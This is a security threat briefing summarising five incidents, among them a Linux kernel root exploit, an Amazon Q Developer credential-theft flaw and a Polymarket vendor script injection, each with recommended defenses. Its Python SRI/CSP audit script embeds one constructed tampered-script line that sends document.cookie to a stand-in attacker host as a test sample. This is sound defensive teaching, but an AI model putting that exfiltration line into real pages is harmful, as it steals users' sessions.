TL;DR
Russian intelligence has expanded its Signal phishing to target Backup Recovery Keys. A Linux kernel privilege escalation (CVE-2026-46331) has a working public exploit. An Amazon Q Developer flaw allows credential theft via malicious repositories. Immediate patching and user education are required.
Executive Summary
- FBI and CISA warn that Russian intelligence phishing attacks targeting Signal now coerce victims into revealing Backup Recovery Keys, escalating account compromise beyond temporary credential theft.
- Linux kernel out-of-bounds write (CVE-2026-46331, “pedit COW”) enables local unprivileged users to gain root access; a working public exploit is available.
- Amazon Q Developer flaw (CVE-2026-12957, CVSS 8.5) allows malicious repositories to execute arbitrary commands and exfiltrate cloud credentials; AWS has patched the vulnerability.
- New SharkLoader malware family, delivered in a campaign Kaspersky tracks as StrikeShark, loads Cobalt Strike Beacon onto compromised hosts.
- Polymarket customers lost an estimated $3 million after malicious script injection via third-party vendor breach.
Top Threats Today
1. Russian Intelligence Expands Signal Phishing to Backup Recovery Keys
Severity: HIGH Affected: Government
The FBI and CISA have updated their March warning about Russian intelligence phishing Signal accounts. Attackers have escalated their technique: they now coerce targets into handing over their Signal Backup Recovery Key [1]. Once obtained, the attacker can restore the account's backup and read historical messages [1][2]. This represents a significant evolution from previous credential-only theft, as recovery keys provide persistent access to encrypted message history [2].
Sources: [1] The Hacker News; [2] BleepingComputer
Recommended Action
- Brief users on Signal phishing tactics and the critical sensitivity of Backup Recovery Keys; advise never sharing these keys even with apparent support contacts
- Enable Signal's Registration Lock (PIN) so that a phished verification code alone cannot re-register the account, and have users verify safety numbers with sensitive contacts
- Signal provides no central access logs, so have users review the Linked Devices list in Signal settings and treat any device they do not recognize, or any unexplained backup-restore prompt, as a compromise indicator
2. Linux Kernel Privilege Escalation (CVE-2026-46331) with Public Exploit
Severity: HIGH Affected: Technology
A flaw in the Linux kernel's traffic-control subsystem allows local unprivileged users to gain root access on affected systems [1]. CVE-2026-46331, nicknamed “pedit COW,” is an out-of-bounds write in the packet-editing action (act_pedit) that corrupts shared page-cache memory [1]. A working exploit is already public, so attackers need no further development effort to use it [1].
Sources: [1] The Hacker News
Recommended Action
- Prioritize Linux kernel patching on all affected systems; identify systems where local-user privilege escalation poses highest risk (shared multi-tenant environments, container hosts)
- Review and restrict local user access on production systems; apply principle of least privilege
- Until patched, restrict unprivileged user namespaces where workloads allow it (sysctl user.max_user_namespaces=0, or kernel.unprivileged_userns_clone=0 on Debian and Ubuntu kernels); configuring traffic-control actions normally requires CAP_NET_ADMIN, and an unprivileged user namespace is the usual way a local user obtains it
- Watch dmesg and kernel logs for oops, BUG or warning messages that reference act_pedit or page-cache corruption, and audit tc/netlink activity by unprivileged users
3. Amazon Q Developer Credential Theft via Malicious Repositories (CVE-2026-12957)
Severity: HIGH Affected: Technology
A high-severity flaw in Amazon Q Developer (CVSS 8.5) allowed a malicious repository to run commands and steal a developer's cloud credentials [1]. The attack path was short: a developer opens the repository and trusts the workspace, and Amazon Q automatically starts the Model Context Protocol (MCP) servers defined in the repository's configuration, which can run arbitrary commands and exfiltrate the developer's cloud credentials [1]. AWS has patched the vulnerability and published an advisory to inform customers [2].
Sources: [1] The Hacker News; [2] SecurityWeek
Recommended Action
- Update Amazon Q Developer to the latest patched version immediately
- Review recent Amazon Q workspace activity logs to identify repositories opened and trusted by developers
- Rotate any cloud credentials that may have been exposed; audit CloudTrail for unauthorized API calls using developer credentials
- Restrict Amazon Q MCP configuration execution or require explicit approval before running untrusted repository configurations
4. SharkLoader Malware Deploys Cobalt Strike in StrikeShark Campaign
Severity: HIGH Affected: Technology
A newly discovered cyber attack campaign delivers SharkLoader, a previously undocumented malware family that acts as a loader for deploying Cobalt Strike Beacon on compromised hosts [1]. Kaspersky is tracking the activity under the moniker StrikeShark [1]. Custom loaders of this kind exist to get a commodity implant such as Beacon past endpoint detection and to establish command-and-control access [1].
Sources: [1] The Hacker News
Recommended Action
- Scan endpoints and networks for Cobalt Strike beacon signatures and network indicators of compromise associated with SharkLoader
- Review email and web-gateway logs for malware delivery vectors; block identified C2 domains and IP addresses
- Monitor for lateral movement and credential dumping activity typical of Cobalt Strike post-exploitation
5. Polymarket Supply-Chain Attack: $3 Million in Customer Losses
Severity: HIGH Affected: Finance
Polymarket customers lost an estimated $3 million after hackers injected a malicious script into the platform's frontend following a breach at a third-party vendor [1]. Polymarket stated it will fully reimburse affected customers [1]. Because a third-party script runs with the full privileges of the page that loads it, a compromise at the vendor becomes a compromise of every customer session.
Sources: [1] BleepingComputer
Recommended Action
- If you use third-party vendors for frontend hosting or scripts, immediately verify their security posture and audit recent code changes for unauthorized modifications
- Pin third-party scripts with Subresource Integrity (SRI) hashes so a modified file fails to load, and deploy a Content Security Policy (CSP) with an explicit script-src allow-list and violation reporting so a script injected from an unlisted origin is blocked and visible
- Review vendor access logs and incident response reports; monitor for similar injection patterns targeting your organization
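To make the SRI and CSP controls concrete, the script below audits a page's external scripts against fetched bodies and derives a script-src allow-list from the page's own script origins. It is an added example, not Polymarket's or any vendor's code. It assumes the script bodies were fetched in a separate step (here they are constructed inline so the audit runs offline), that the page's own origin is https://app.example, and that a /csp-report endpoint exists; the vendor bundle, its tampered copy and the page are all constructed for this example.

```python
"""Subresource Integrity (SRI) and CSP audit for third-party scripts.

Added example, not Polymarket's or any vendor's code. Script bodies are
assumed to be fetched elsewhere; the page origin, the /csp-report endpoint
and all sample content below are assumptions constructed for this example.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

_ALGOS = ("sha256", "sha384", "sha512")  # the only digests SRI accepts


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity token exactly as the browser computes it: <algo>-<base64(digest)>."""
    if algo not in _ALGOS:
        raise ValueError(f"SRI does not support {algo}")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode('ascii')}"


# Constructed vendor bundle, and the same bundle with an injected line that
# exfiltrates the session cookie (both made up for this example).
VENDOR_URL = "https://cdn.vendor.example/widget.js"
VENDOR_JS = b"window.vendorWidget=function(el){el.textContent='ok';};"
VENDOR_JS_TAMPERED = VENDOR_JS + b"fetch('https://evil.example/?c='+document.cookie);"

# Constructed page: the vendor script is pinned with SRI, the first-party one is not.
PAGE_HTML = f"""<!doctype html><html><head>
<script src="{VENDOR_URL}" integrity="{sri_hash(VENDOR_JS)}" crossorigin="anonymous"></script>
<script src="/static/app.js"></script>
</head><body></body></html>"""


class _ScriptTags(HTMLParser):
    """Collect the attributes of every <script src=...> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: list[dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = {k: (v or "") for k, v in attrs}
            if a.get("src"):
                self.scripts.append(a)


def _script_tags(html: str) -> list[dict[str, str]]:
    p = _ScriptTags()
    p.feed(html)
    return p.scripts


def _integrity_ok(tokens: list[str], body: bytes) -> bool:
    """True if any token with a supported algorithm matches the fetched body."""
    return any(t.split("-", 1)[0] in _ALGOS and t == sri_hash(body, t.split("-", 1)[0]) for t in tokens)


def audit_page(html: str, fetched: dict[str, bytes], page_origin: str = "https://app.example") -> list[dict[str, str]]:
    """One finding per external script.

    status: ok | mismatch | no-integrity | missing-crossorigin | not-fetched
    'mismatch' is what a vendor-side injection looks like once the hash is
    pinned: the browser refuses to execute the modified file.
    """
    page_host = urlsplit(page_origin).netloc
    out = []
    for a in _script_tags(html):
        src = a["src"]
        tokens = a.get("integrity", "").split()
        host = urlsplit(src).netloc
        body = fetched.get(src)
        if not tokens:
            status = "no-integrity"
        elif host and host != page_host and "crossorigin" not in a:
            status = "missing-crossorigin"  # without CORS the browser cannot verify SRI cross-origin
        elif body is None:
            status = "not-fetched"
        elif _integrity_ok(tokens, body):
            status = "ok"
        else:
            status = "mismatch"
        out.append({"src": src, "status": status})
    return out


def build_csp(html: str) -> str:
    """script-src allow-list from the page's own script origins, plus the
    directives that close the common injection fallbacks."""
    origins = sorted({f"{u.scheme}://{u.netloc}" for u in (urlsplit(a["src"]) for a in _script_tags(html)) if u.netloc})
    return "; ".join([
        "default-src 'self'",
        " ".join(["script-src 'self'", *origins]),
        "object-src 'none'",
        "base-uri 'self'",
        "report-uri /csp-report",  # assumed reporting endpoint
    ])


if __name__ == "__main__":
    for label, body in (("intact", VENDOR_JS), ("tampered", VENDOR_JS_TAMPERED)):
        print(label, audit_page(PAGE_HTML, {VENDOR_URL: body}))
    print(build_csp(PAGE_HTML))
```

The two checks are complementary: SRI catches the Polymarket pattern, where the vendor's legitimate URL starts serving modified content, while the CSP blocks a script that the injected code tries to pull from an origin the page never listed, and the report endpoint turns either failure into an alert rather than a silent outage. Pinning a hash does mean the page must be redeployed whenever the vendor ships a new bundle, which is the price of not trusting the vendor's CDN unconditionally.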
Ongoing Coverage
Cisco and related vendors: Earlier coverage of active Cisco exploitation and FortiBleed credential harvesting remains relevant; see our June 25 briefing for details on CISA-mandated patching deadlines.
Today’s Action Checklist
- ☐ URGENT: Patch Linux systems for CVE-2026-46331 (pedit COW); prioritize shared and container environments
- ☐ URGENT: Update Amazon Q Developer to patch CVE-2026-12957; audit recent workspace/repository activity and rotate cloud credentials
- ☐ HIGH: Disseminate Signal phishing advisory to users; reinforce that Signal support will never request Backup Recovery Keys
- ☐ HIGH: Scan for SharkLoader and Cobalt Strike indicators; review email/web logs for malware delivery and block identified C2 domains
- ☐ MEDIUM: Review third-party vendor dependencies in frontend and SaaS applications; implement CSP and SRI controls